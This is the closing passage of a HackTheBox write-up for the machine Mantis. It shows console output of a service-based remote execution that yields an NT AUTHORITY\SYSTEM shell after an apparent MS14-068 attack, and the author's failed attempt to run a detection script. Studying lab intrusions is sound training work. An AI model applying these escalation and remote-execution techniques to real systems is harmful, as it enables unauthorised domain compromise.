[*] Uploading file nZdpZwjD.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service mUmk on 10.10.10.52.....
[*] Starting service mUmk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>
```
From the writeups that I did look at, none of them really gave a good explanation of how they detected that this machine was vulnerable to MS14-068. There was this writeup https://medium.com/secjuice/hackthebox-mantis-writeup-9c2b50c4b30b which said that he used the script from responder https://github.com/SpiderLabs/Responder/blob/master/tools/FindSMB2UPTime.py However when I tried to run this script on my system I couldn't get the module packets installed and it just kept throwing me this error message

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $python FindSMB2UPTime.py 
Traceback (most recent call last):
  File "FindSMB2UPTime.py", line 24, in <module>
    from packets import SMB2Header, SMB2Nego, SMB2NegoData
ImportError: No module named packets
```
I couldn't install this module using pip2 or pip so this script was a dead end as I couldn't get it to work for me

That was root on the machine Mantis from hackthebox!
